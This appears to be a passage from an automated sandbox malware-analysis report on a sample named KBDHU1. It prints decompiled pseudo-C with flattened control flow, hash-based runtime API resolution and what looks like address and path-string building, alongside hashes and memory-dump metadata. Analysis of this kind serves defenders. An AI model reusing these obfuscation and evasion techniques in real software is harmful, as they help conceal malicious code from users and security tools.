			E02349FC8(void* __eax, void* __ebx, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, char _a40, char _a44, intOrPtr _a48, char _a56, char _a576) {
				intOrPtr* _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t37;
				signed int _t38;
				intOrPtr* _t41;
				signed int _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t82;
				intOrPtr* _t95;
				intOrPtr _t98;
				char* _t100;
				intOrPtr _t101;
				intOrPtr _t134;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				char* _t157;
				void* _t158;
				char _t161;
				intOrPtr _t165;
				void* _t166;
				void* _t170;
				void* _t171;

				_t37 = __eax;
				goto L3;
				do {
					while(1) {
						L3:
						_t170 = _t37 - 0x1bec2acf;
						if(_t170 > 0) {
							goto L41;
						}
						L4:
						if(_t170 == 0) {
							_t54 =  *0x234dea8;
							__eflags = _t54;
							if(_t54 == 0) {
								_t100 = E02343F20(0xbb398380);
								_t54 = E02343E80(_t95, _t100, 0x97f883e, _t161);
								 *0x234dea8 = _t54;
							}
							_t148 =  *_t54();
							_t56 =  *0x234e1a0;
							__eflags = _t56;
							if(_t56 == 0) {
								_t100 = E02343F20(0xbb398380);
								_t56 = E02343E80(_t95, _t100, 0x26c3f343, _t161);
								 *0x234e1a0 = _t56;
							}
							 *_t56(_t148, 0, _t95);
							_t149 = _a12;
							_t37 = 0x1dedf83c;
							continue;
						} else {
							_t171 = _t37 - 0x191840a9;
							if(_t171 > 0) {
								__eflags = _t37 - 0x1a29c84b;
								if(_t37 == 0x1a29c84b) {
									_t60 =  *0x234dea8;
									__eflags = _t60;
									if(_t60 == 0) {
										_t100 = E02343F20(0xbb398380);
										_t60 = E02343E80(_t95, _t100, 0x97f883e, _t161);
										 *0x234dea8 = _t60;
									}
									_t150 =  *_t60();
									_t62 =  *0x234dcec;
									__eflags = _t62;
									if(_t62 == 0) {
										_t100 = E02343F20(0xbb398380);
										_t62 = E02343E80(_t95, _t100, 0xe9233692, _t161);
										 *0x234dcec = _t62;
									}
									_t53 =  *_t62(_t150, 8, 0x48);
									_a16 = _t53;
									__eflags = _t53;
									if(_t53 == 0) {
										L59:
										return _t53;
									} else {
										_t149 = _a12;
										_t37 = 0x1fc710ef;
										continue;
									}
								} else {
									__eflags = _t37 - 0x1a44b2a5;
									if(_t37 != 0x1a44b2a5) {
										break;
									} else {
										_t157 = E023434C0(0x234da50);
										_t66 =  *0x234dc60;
										__eflags = _t66;
										if(_t66 == 0) {
											_t66 = E02343E80(_t95, E02343F20(0xe66945e6), 0xcca28b0d, _t161);
											 *0x234dc60 = _t66;
										}
										 *_t66( &_a56, 0x104, _t157,  &_a576, _t95);
										_t166 = _t166 + 0x14;
										_t100 = _t157;
										E02343460(_t100);
										_t149 = _a24;
										_t37 = 0x10f8a433;
										continue;
									}
								}
							} else {
								if(_t171 == 0) {
									_t101 = _a28;
									 *((intOrPtr*)(_t101 + 0x24)) = _t149;
									_t70 =  *0x234e2dc; // 0x0
									 *((intOrPtr*)(_t101 + 0x20)) = _t70;
									 *0x234e2dc = _t101;
									return _t70;
								} else {
									if(_t37 == 0xa70e03e) {
										_t71 =  *0x234dc70;
										__eflags = _t71;
										if(_t71 == 0) {
											_t100 = E02343F20(0xbb398380);
											_t71 = E02343E80(_t95, _t100, 0x560d239b, _t161);
											 *0x234dc70 = _t71;
										}
										 *_t71(_a44);
										_t37 = 0x191840a9;
										continue;
									} else {
										if(_t37 == 0x10f8a433) {
											_push(0);
											_push(_t100);
											_t100 = 0;
											E02344BA0(_t95, 0,  &_a56, _t161, 1);
											_t166 = _t166 + 0xc;
											_t37 = 0x1bec2acf;
											continue;
										} else {
											if(_t37 != 0x18d473c5) {
												break;
											} else {
												_t154 =  *0x234e2ec; // 0x78e578
												_t75 =  *0x234e024;
												_t155 = _t154 + 0x278;
												_a48 = _t155;
												if(_t75 == 0) {
													_t100 = E02343F20(0xbb398380);
													_t75 = E02343E80(_t95, _t100, 0x5262aefc, _t161);
													 *0x234e024 = _t75;
												}
												_t76 =  *_t75(_t155);
												_t156 =  *0x234ded0;
												_a48 = 2 + _t76 * 2;
												if(_t156 == 0) {
													_t100 = E02343F20(0xbb398380);
													_t156 = E02343E80(_t95, _t100, 0x23563937, _t161);
													 *0x234ded0 = _t156;
												}
												_t165 = _t156;
												if(_t156 == 0) {
													_t100 = E02343F20(0xbb398380);
													_t156 = E02343E80(_t95, _t100, 0x23563937, _t165);
													 *0x234ded0 = _t156;
												}
												_t98 = _t156;
												if(_t156 == 0) {
													_t100 = E02343F20(0xbb398380);
													 *0x234ded0 = E02343E80(_t98, _t100, 0x23563937, _t165);
												}
												_t146 =  *0x234dce8; // 0x0
												if(_t146 == 0) {
													_t100 = E02343F20(0xbb398380);
													_t146 = E02343E80(_t98, _t100, 0xb310a228, _t165);
													 *0x234dce8 = _t146;
												}
												_t82 =  *_t146(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_a40, 0x100000, 1, 0);
												_t149 = _v8;
												_t134 = _v12;
												asm("sbb eax, eax");
												_t37 = ( ~_t82 & 0x069deb97) + 0x1f9eb481;
												_t95 = _v0;
												L2:
												_t161 = _a36;
												while(1) {
													L3:
													_t170 = _t37 - 0x1bec2acf;
													if(_t170 > 0) {
														goto L41;
													}
													goto L4;
												}
												goto L41;
											}
										}
									}
								}
							}
						}
						L60:
						L41:
						__eflags = _t37 - 0x1fc710ef;
						if(__eflags > 0) {
							__eflags = _t37 - 0x263ca018;
							if(_t37 == 0x263ca018) {
								_t100 =  &_a44;
								_t38 = E0234B3A0(_t100,  &_a36);
								asm("sbb eax, eax");
								_t37 = ( ~_t38 & 0x28f9ad68) + 0xa70e03e;
								goto L2;
							} else {
								__eflags = _t37 - 0x336a8da6;
								if(_t37 != 0x336a8da6) {
									break;
								} else {
									_t100 = _t161;
									_t41 = E02341140(_a40);
									_t134 = _a20;
									_t95 = _t41;
									__eflags = _t95;
									_a32 = _t95;
									_t37 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t100 = _t149;
								_t44 = E0234AB50(_t100, _t134,  &_a576);
								_t134 = _a20;
								_t166 = _t166 + 4;
								asm("sbb eax, eax");
								_t37 = ( ~_t44 & 0xf935bf44) + 0x1f9eb481;
								continue;
							} else {
								__eflags = _t37 - 0x1dedf83c;
								if(_t37 == 0x1dedf83c) {
									_t47 =  *0x234dea8;
									__eflags = _t47;
									if(_t47 == 0) {
										_t100 = E02343F20(0xbb398380);
										_t47 = E02343E80(_t95, _t100, 0x97f883e, _t161);
										 *0x234dea8 = _t47;
									}
									_t158 =  *_t47();
									_t49 =  *0x234e1a0;
									__eflags = _t49;
									if(_t49 == 0) {
										_t100 = E02343F20(0xbb398380);
										_t49 = E02343E80(_t95, _t100, 0x26c3f343, _t161);
										 *0x234e1a0 = _t49;
									}
									 *_t49(_t158, 0, _t161);
									_t149 = _a12;
									_t37 = 0xa70e03e;
									_t134 = _a8;
									continue;
								} else {
									__eflags = _t37 - 0x1f9eb481;
									if(_t37 == 0x1f9eb481) {
										_t53 = E02344250(_t95, _a28);
										goto L59;
									} else {
										break;
									}
								}
							}
						}
						goto L60;
					}
					__eflags = _t37 - 0x1c40b504;
				} while (_t37 != 0x1c40b504);
				return _t37;
				goto L60;
			}

0x02349fc8
0x02349fc8
0x02349fd0
0x02349fd0
0x02349fd0
0x02349fd0
0x02349fd5
0x00000000
0x00000000
0x02349fdb
0x02349fdb
0x0234a25f
0x0234a264
0x0234a266
0x0234a277
0x0234a279
0x0234a27e
0x0234a27e
0x0234a285
0x0234a287
0x0234a28c
0x0234a28e
0x0234a29f
0x0234a2a1
0x0234a2a6
0x0234a2a6
0x0234a2af
0x0234a2b1
0x0234a2b5
0x00000000
0x02349fe1
0x02349fe1
0x02349fe6
0x0234a17a
0x0234a17f
0x0234a1ee
0x0234a1f3
0x0234a1f5
0x0234a206
0x0234a208
0x0234a20d
0x0234a20d
0x0234a214
0x0234a216
0x0234a21b
0x0234a21d
0x0234a22e
0x0234a230
0x0234a235
0x0234a235
0x0234a23f
0x0234a241
0x0234a245
0x0234a247
0x0234a40c
0x0234a416
0x0234a24d
0x0234a24d
0x0234a251
0x00000000
0x0234a256
0x0234a181
0x0234a181
0x0234a186
0x00000000
0x0234a18c
0x0234a196
0x0234a198
0x0234a19d
0x0234a19f
0x0234a1b2
0x0234a1b7
0x0234a1b7
0x0234a1d0
0x0234a1d2
0x0234a1d5
0x0234a1d7
0x0234a1dc
0x0234a1e0
0x00000000
0x0234a1e5
0x0234a186
0x02349fec
0x02349fec
0x0234a3e3
0x0234a3e7
0x0234a3ea
0x0234a3ef
0x0234a3f2
0x0234a402
0x02349ff2
0x02349ff7
0x0234a142
0x0234a147
0x0234a149
0x0234a15a
0x0234a15c
0x0234a161
0x0234a161
0x0234a16a
0x0234a170
0x00000000
0x02349ffd
0x0234a002
0x0234a121
0x0234a123
0x0234a12a
0x0234a12c
0x0234a135
0x0234a138
0x00000000
0x0234a008
0x0234a00d
0x00000000
0x0234a013
0x0234a013
0x0234a019
0x0234a01e
0x0234a024
0x0234a02a
0x0234a03b
0x0234a03d
0x0234a042
0x0234a042
0x0234a048
0x0234a04a
0x0234a057
0x0234a05d
0x0234a06e
0x0234a075
0x0234a077
0x0234a077
0x0234a07d
0x0234a081
0x0234a092
0x0234a099
0x0234a09b
0x0234a09b
0x0234a0a1
0x0234a0a5
0x0234a0b6
0x0234a0bf
0x0234a0bf
0x0234a0c5
0x0234a0cd
0x0234a0de
0x0234a0e5
0x0234a0e7
0x0234a0e7
0x0234a104
0x0234a106
0x0234a10c
0x0234a110
0x0234a117
0x02349fb9
0x02349fc2
0x02349fc2
0x02349fd0
0x02349fd0
0x02349fd0
0x02349fd5
0x00000000
0x00000000
0x00000000
0x02349fd5
0x00000000
0x02349fd0
0x0234a00d
0x0234a002
0x02349ff7
0x02349fec
0x02349fe6
0x00000000
0x0234a2c3
0x0234a2c3
0x0234a2c8
0x0234a389
0x0234a38e
0x0234a3c3
0x0234a3c7
0x0234a3d2
0x0234a3d9
0x00000000
0x0234a390
0x0234a390
0x0234a395
0x00000000
0x0234a39b
0x0234a39f
0x0234a3a1
0x0234a3a6
0x0234a3aa
0x0234a3ac
0x0234a3ae
0x0234a3b7
0x00000000
0x0234a3b7
0x0234a395
0x0234a2ce
0x0234a2ce
0x0234a367
0x0234a36a
0x0234a36f
0x0234a373
0x0234a378
0x0234a37f
0x00000000
0x0234a2d4
0x0234a2d4
0x0234a2d9
0x0234a2fc
0x0234a301
0x0234a303
0x0234a314
0x0234a316
0x0234a31b
0x0234a31b
0x0234a322
0x0234a324
0x0234a329
0x0234a32b
0x0234a33c
0x0234a33e
0x0234a343
0x0234a343
0x0234a34c
0x0234a34e
0x0234a352
0x0234a357
0x00000000
0x0234a2db
0x0234a2db
0x0234a2e0
0x0234a407
0x00000000
0x00000000
0x00000000
0x00000000
0x0234a2e0
0x0234a2d9
0x0234a2ce
0x00000000
0x0234a2c8
0x0234a2e6
0x0234a2e6
0x0234a2fb
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0234A0FB
GetCurrentProcess.KERNEL32(00000000), ref: 0234A0FE
GetCurrentProcess.KERNEL32(00000000), ref: 0234A101

Strings

>p, xrefs: 02349FF2
79V#, xrefs: 0234A0B1
xx, xrefs: 0234A013
79V#, xrefs: 0234A069
79V#, xrefs: 0234A08D

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p$xx
API String ID: 2050909247-4147152687
Opcode ID: 07e8b373b04548b09557cc1382943dd645e4a3c18f456ee20683fec91bdf92ea
Instruction ID: dfcbd79d66108b495731bf96ebe3f32af7c36679b2177846842b12025f8d45f8
Opcode Fuzzy Hash: 07e8b373b04548b09557cc1382943dd645e4a3c18f456ee20683fec91bdf92ea
Instruction Fuzzy Hash: F7310776F813159BCB249AA4645471F32DBABC8B84F2809D9E845D7340DF35FC418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 023412B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E023412B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr _t199;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x234dea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E02343E80(_t191, E02343F20(0xbb398380), 0x97f883e, _t278);
									 *0x234dea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x234e1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E02343E80(_t191, E02343F20(0xbb398380), 0x26c3f343, _t278);
									 *0x234e1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E02341FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E02344ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E02344250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E02344250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x234dd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E02343E80(_t191, E02343F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x234dd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E02341950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E023434C0(0x234d0e0);
												_t182 =  *0x234dc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E02343E80(_t191, E02343F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x234dc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E02343460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E02344250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E023442F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E023457E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E02344250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E02341E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E023434C0(0x234d080);
									_t274 =  *0x234dc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E02343E80(_t191, E02343F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x234dc60 = _t274;
									}
									_t199 =  *0x234e2e0; // 0x739a20
									_t97 = _t199 + 0xc; // 0x234d398
									_t243 =  *_t97;
									_t98 =  &(_t243[2]); // 0x504b8f
									_t99 =  &(_t243[1]); // 0x504b8ff7
									_t100 =  &(_t243[3]); // 0xd300504b
									 *_t274( &_v2816, 0x40, _t266,  *_t100 & 0x000000ff,  *_t98 & 0x000000ff,  *_t99 & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E02343460(_t266);
									_t127 =  *0x234e2e0; // 0x739a20
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_t105 = _t127 + 0xc; // 0x234d398
									_t106 =  *_t105 + 4; // 0x60d30050
									_v2848 =  *_t106 & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E023442F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E02345BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x234dea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E02343E80(_t191, E02343F20(0xbb398380), 0x97f883e, _t278);
									 *0x234dea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x234e1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E02343E80(_t191, E02343F20(0xbb398380), 0x26c3f343, _t278);
									 *0x234e1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E02344250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E02342290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E02341C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E02342C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x023412b0
0x023412b8
0x023412c0
0x023412c2
0x023412c6
0x023412c8
0x023412cc
0x023412d0
0x023412d5
0x023412d9
0x023412dd
0x023412e1
0x023412e1
0x023412e1
0x023412e8
0x023412f0
0x023412f0
0x023412f0
0x023412f0
0x023412f5
0x00000000
0x00000000
0x023412fb
0x02341589
0x0234158e
0x02341590
0x023415a3
0x023415a8
0x023415a8
0x023415af
0x023415b1
0x023415b6
0x023415b8
0x023415cb
0x023415d0
0x023415d0
0x023415dc
0x023415de
0x023415e2
0x023415e7
0x00000000
0x02341301
0x02341301
0x02341306
0x0234148e
0x02341493
0x02341556
0x0234155b
0x00000000
0x02341561
0x02341569
0x0234156e
0x02341574
0x02341578
0x0234157f
0x00000000
0x0234157f
0x02341499
0x02341499
0x023414e6
0x023414fe
0x023414fe
0x023414ff
0x02341510
0x0234151d
0x02341523
0x02341528
0x0234152b
0x0234152e
0x02341531
0x02341534
0x02341534
0x02341534
0x02341537
0x0234153b
0x0234153b
0x0234153f
0x02341545
0x02341548
0x0234154d
0x00000000
0x0234149b
0x0234149b
0x023414a0
0x023414cb
0x023414d0
0x023414d4
0x023414d9
0x00000000
0x023414a2
0x023414a2
0x023414a7
0x02341879
0x0234187b
0x02341880
0x0234188e
0x00000000
0x00000000
0x00000000
0x023414a7
0x023414a0
0x02341499
0x0234130c
0x0234130c
0x02341452
0x02341457
0x02341459
0x0234146c
0x02341471
0x02341471
0x02341476
0x02341478
0x0234147c
0x02341480
0x02341484
0x00000000
0x02341312
0x02341312
0x02341317
0x02341414
0x02341419
0x00000000
0x0234141f
0x0234142f
0x02341434
0x02341438
0x0234143b
0x02341441
0x02341448
0x00000000
0x02341448
0x0234131d
0x0234131d
0x023413b5
0x023413b7
0x023413bc
0x023413be
0x023413d1
0x023413d6
0x023413d6
0x023413f6
0x023413f8
0x023413fd
0x02341402
0x02341406
0x0234140b
0x00000000
0x02341323
0x02341328
0x02341394
0x02341399
0x0234139d
0x023413a2
0x00000000
0x0234132a
0x0234132f
0x00000000
0x02341335
0x0234133b
0x02341343
0x02341345
0x02341349
0x02341353
0x0234135c
0x0234135d
0x02341364
0x02341369
0x0234136d
0x02341371
0x02341375
0x02341375
0x0234137a
0x0234137a
0x0234137e
0x02341382
0x02341387
0x00000000
0x02341387
0x0234132f
0x02341328
0x0234131d
0x02341317
0x0234130c
0x02341306
0x00000000
0x023412fb
0x023415f0
0x023415f5
0x0234174c
0x02341751
0x02341845
0x0234184d
0x02341855
0x02341859
0x0234185e
0x02341864
0x02341868
0x0234186f
0x00000000
0x02341757
0x02341757
0x0234175c
0x023417c0
0x023417c5
0x023417cb
0x023417cd
0x023417cf
0x023417e7
0x023417e9
0x023417e9
0x023417ef
0x023417f5
0x023417f5
0x023417fb
0x02341800
0x02341806
0x02341813
0x02341815
0x0234181a
0x0234181f
0x02341824
0x02341828
0x0234182c
0x02341830
0x02341833
0x02341837
0x0234183b
0x00000000
0x0234175e
0x0234175e
0x02341763
0x00000000
0x02341769
0x02341779
0x02341782
0x02341784
0x02341788
0x0234178a
0x00000000
0x02341790
0x02341795
0x02341796
0x0234179c
0x0234179e
0x023417a1
0x023417a5
0x023417a7
0x00000000
0x023417ad
0x023417ad
0x023417b1
0x00000000
0x023417b1
0x023417a7
0x0234178a
0x02341763
0x0234175c
0x023415fb
0x023415fb
0x023416e5
0x023416ea
0x023416ec
0x023416ff
0x02341704
0x02341704
0x0234170b
0x0234170d
0x02341712
0x02341714
0x02341727
0x0234172c
0x0234172c
0x02341738
0x0234173a
0x0234173e
0x02341743
0x00000000
0x02341601
0x02341601
0x02341606
0x023416bf
0x023416c4
0x00000000
0x023416ca
0x023416ce
0x023416d3
0x023416d7
0x023416dc
0x00000000
0x023416dc
0x0234160c
0x0234160c
0x0234169f
0x023416a4
0x023416aa
0x023416ae
0x023416b5
0x00000000
0x02341612
0x02341612
0x02341617
0x02341680
0x02341685
0x02341689
0x0234168e
0x00000000
0x02341619
0x02341619
0x0234161e
0x00000000
0x02341624
0x0234162c
0x02341631
0x02341639
0x02341641
0x02341649
0x02341651
0x02341656
0x0234165b
0x0234165f
0x02341662
0x02341668
0x0234166f
0x00000000
0x0234166f
0x0234161e
0x02341617
0x0234160c
0x02341606
0x023415fb
0x00000000
0x023414ad
0x023414ad
0x023414ad
0x023414c6
0x00000000
0x023414c6

Strings

a7a&, xrefs: 02341612
Ei, xrefs: 023417D1
Ei, xrefs: 023413C0
E?*, xrefs: 02341601
a7a&, xrefs: 02341548

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: fc7fd51dab8cae3ab918d162f00defd3013eb54c3917466cd2c2e1c8a478f51e
Instruction ID: 050569d7bbb6274cdb6d2a367d7279c89811ecadd09d3f626395539716ed2583
Opcode Fuzzy Hash: fc7fd51dab8cae3ab918d162f00defd3013eb54c3917466cd2c2e1c8a478f51e
Instruction Fuzzy Hash: CDE1CD716187018BC728DF68D890A6BB3E6ABC4344F14499DE89ADB340DF34FD85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 022E0360, Relevance: 9.2, APIs: 6, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMove
